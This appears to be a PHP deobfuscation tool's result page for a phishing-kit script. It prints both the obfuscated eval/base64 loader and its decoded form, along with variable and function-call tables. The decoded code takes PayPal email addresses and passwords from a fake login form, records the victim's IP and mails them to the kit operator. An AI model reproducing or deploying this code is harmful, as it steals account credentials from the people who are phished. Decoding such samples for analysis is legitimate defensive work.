Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* Crypted For Not Detected In Browsers By x-Black Hat */$OOO000000=urldecode('%66%6..

Decoded Output download


session_start();
if ($_POST["ResultadoCaptcha"] == $_SESSION["ResultadoCaptcha"]) 
{
include "put-your-email-here.php";
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$message .= "================[x-Black Hat]================
";
$message .= "PayPal Email  : ".$_POST['1']."
";
$message .= "PayPal Password  : ".$_POST['2']."
";
$message .= "================[x-Black Hat]================
";
$message .= "IP	: http://www.geoiptool.com/?IP=$ip
";
$message .= "================[x-Black Hat]================

";
$subject = "PPL Login [$ip]";
$headers = "From: PPL <localhost>";
$headers .= $_POST['eMailAdd']."
";
$headers .= "MIME-Version: 1.0
";
mail($mailto,$subject,$message,$headers);
header("Location:../websc-loading.php");
}
else {
header("Location:../websc-loading.php");
};

Did this file decode correctly?

Original Code

<?php /* Crypted For Not Detected In Browsers By x-Black Hat */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x430;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDUzNyk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnRW50ZXJ5b3V3a2hSSFlLTldPVVRBYUJiQ2NEZEZmR2dJaUpqTGxNbVBwUXFTc1Z2WHhaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>TaM~{kr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLO0xNWLyHA1SmT09NHeEXHr8Xk10PkrfHT0knTyYdk09NTzEXHeEXTZffhtOuTr9tWAxTBZfNHr8XHr9NHeEmbUILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==tmYlF3Ypd25gF3OiFmWPhTShDBCIhtOgAr9TaySJAMazfBx0CBOvW2yXfoYPCUkfwe09wtOgA0aTA0lNTlSJAMazfBx0CBOvW2yXfoYPCUkfhUEhGXppdMYSfBOlwtkXfbWsGB91FJ1ldBypdt1PcbklRmnPFtw7tJOpFtE9woflfoaVfJIJALaYT1Oyb0yrOywJhTShkoivF3OVCB1lwe0Ic2a0Do9zfok5CBOLFJILDbEpKXPLdBazF2ymcUEVNUEJNT09NT09NT09NT09NT09Nas4RAkSCBYqwriify09NT09NT09NT09NT09NT09bo4JKXPLdBazF2ymcUEVNUEJAoy5AoySwrasCBlSwtE6wtwVky9WT1YABZFxk10VwlxVwjShko1lF3Yic2AIRj0IwlniGanidtnWCbYzf29ZctEIKJEJRJOgAr9TaySmHJffRJkFdJw7tJOscbYzCBflwt49wtw9NT09NT09NT09NT09NT09B3IsWMxiC2SIUoy0bT09NT09NT09NT09NT09NT1FdJw7tJOscbYzCBflwt49wtkkAEL6woi0fuE6RZ93f3FVc2avDbn0d29SRMYvdU8/UaE9kolXbo4JKXPLdBazF2ymcUEVNUEJNT09NT09NT09NT09NT09Nas4RAkSCBYqwriify09NT09NT09NT09NT09NT09bo5FdJw7tJOzfBkQcBY0we0IwlnWTtnHd2fpdJndkolXbUw7tJOPcByLcbkzwe0IwLcZd206wynWTtE8do9jCBxPd3Y0NJw7tJOPcByLcbkzwt49wtOgAr9TaySmcA1iDBxncoWmbU4Jbo4JKXPLDoaicoaZFZEVNUEJTAlYOU1BcbkzDB9VKJExRjnFdJw7tM1iDBXPko1iDBx0dZXLF3aJDMajftXLdBazF2ymcUXLDoaicoaZFZL7tMilCBOlFJIJTo9jCbOpd246RJ4vf2aJF2Hsdo9icolVcZ5XDuEJhTShgWplduYlwuShDoaicoaZhtkHd2YifolvdjPVRJ93cBkzCZ1Sd2yLDB5mRmnPFtwpKXp9KX==EUG{sB_Xp

Function Calls

fopen 1
fread 3
strtr 2
fclose 1
urldecode 1
str_replace 1
base64_decode 3

Variables

$O000O0O00 True
$O0O000O00 fgets
$O0O00OO00 fread
$OO00O0000 1072
$OO00O00O0 session_start(); if ($_POST["ResultadoCaptcha"] == $_SESSIO..
$OOO000000 fg6sbehpra4co_tnd
$OOO00000O strtr
$OOO0000O0 base64_decode
$OOO000O00 fopen
$OOO0O0O00 index.php

Stats

MD5 b0d5d0027e4bfd2237acd46d9e6c91dc
Eval Count 3
Decode Time 196 ms